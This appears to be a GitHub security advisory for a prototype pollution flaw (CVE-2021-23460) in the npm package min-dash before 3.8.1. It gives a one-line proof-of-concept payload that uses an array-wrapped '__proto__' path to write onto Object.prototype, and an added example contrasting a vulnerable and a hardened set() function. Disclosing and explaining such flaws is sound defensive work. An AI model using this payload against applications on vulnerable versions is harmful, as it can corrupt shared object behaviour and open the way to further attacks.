
Prototype pollution in min-dash < 3.8.1

High
nikku published GHSA-2m53-83f3-562j Jan 27, 2022

Package

npm min-dash (npm)

Affected versions

< 3.8.1

Patched versions

3.8.1

Description

Impact

The set method is vulnerable to prototype pollution when called with specially crafted inputs: a path element such as the array ["__proto__"] is coerced to the string "__proto__" on property access, so a caller who controls the path can write properties onto Object.prototype.

// Insert the following into poc.js and run `node poc.js` (after installing an affected version of the package, i.e. min-dash < 3.8.1)

let minDash = require("min-dash");
// The first path element is the array ["__proto__"], not the string "__proto__"; property access coerces it to "__proto__", so set() walks onto Object.prototype
minDash.set({}, [["__proto__"], "polluted"], "success");
// Prints "success": the property now lives on Object.prototype and is visible on every object, including the global object
console.log(polluted);
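The following is an added illustration of the mechanism, not code from min-dash or from this advisory: a minimal path-based set() modelled on the shape of min-dash's, in a variant that only compares the key against the string "__proto__" (the pre-3.8.1 situation, where key types are not enforced) and a hardened variant that enforces the key type first. The names setVulnerable, setHardened, probePollution and rejectsPath are this example's own; it runs offline without min-dash installed.

```javascript
// Added example, not min-dash's own code: two variants of a path-based set()
// in the shape of min-dash's. setVulnerable mimics the pre-3.8.1 situation
// (a string comparison guards '__proto__', key types are not enforced);
// setHardened mimics the 3.8.1-style fix (key type enforced before any
// comparison). All names here are this example's own.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Shared walk: create intermediate containers and assign the leaf value.
// guard(key) is called for every path element before it is used.
function setWithGuard(target, path, value, guard) {
  let current = target;
  path.forEach((key, idx) => {
    guard(key);
    const isLeaf = idx === path.length - 1;
    if (isLeaf) {
      current[key] = value;
      return;
    }
    // Missing intermediate: array if the next key is numeric, object otherwise.
    if (current[key] === undefined || current[key] === null) {
      current[key] = typeof path[idx + 1] === 'number' ? [] : {};
    }
    // An array key such as ['__proto__'] is coerced to the string
    // '__proto__' here, so current becomes Object.prototype.
    current = current[key];
  });
  return target;
}

// Pre-fix style guard: exact string comparison only. ['__proto__'] is not
// === '__proto__', so the check passes, yet property access coerces it.
function setVulnerable(target, path, value) {
  return setWithGuard(target, path, value, (key) => {
    if (key === '__proto__') throw new Error('illegal key: __proto__');
  });
}

// Fixed style guard: reject anything that is not a plain string or number
// first, then the property names that lead to a shared prototype.
function setHardened(target, path, value) {
  return setWithGuard(target, path, value, (key) => {
    if (typeof key !== 'string' && typeof key !== 'number') {
      throw new Error('illegal key type: ' + typeof key);
    }
    if (FORBIDDEN_KEYS.has(String(key))) {
      throw new Error('illegal key: ' + key);
    }
  });
}

// Runs the advisory's payload shape against a set() implementation and
// reports whether it threw and whether Object.prototype was polluted.
// The probe property is removed afterwards so runs start from a clean state.
function probePollution(setFn) {
  const probe = 'pollutedByExample';
  let threw = false;
  try {
    setFn({}, [['__proto__'], probe], 'success');
  } catch (e) {
    threw = true;
  }
  const polluted = ({})[probe] === 'success';
  delete Object.prototype[probe];
  return { threw, polluted };
}

// Returns true if setFn refuses the given path.
function rejectsPath(setFn, path) {
  try {
    setFn({}, path, 1);
    return false;
  } catch (e) {
    return true;
  }
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log('vulnerable:', probePollution(setVulnerable)); // { threw: false, polluted: true }
  console.log('hardened:  ', probePollution(setHardened));   // { threw: true, polluted: false }
  console.log('plain "__proto__" string already rejected by vulnerable variant:',
    rejectsPath(setVulnerable, ['__proto__', 'x']));         // true
  console.log('legitimate use:', JSON.stringify(setHardened({}, ['a', 0, 'b'], 1))); // {"a":[{"b":1}]}
}
```

The point to take from the two guards is that the string check alone is not wrong, it is simply reachable only for string keys; the fix closes the gap by refusing every key that is not a string or number before any comparison, so JavaScript's key coercion never gets a chance to turn an array into "__proto__".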

Patches

min-dash >= 3.8.1 fixes the issue.

Workarounds

No workarounds exist for the issue.

References

Closed via #21.

Credits

Credits to Cristian-Alexandru STAICU, who found the vulnerability, and to Idan Digmi from the Snyk Security Team, who responsibly reported the vulnerability to us.

Severity

High

CVE ID

CVE-2021-23460

Weaknesses

No CWEs
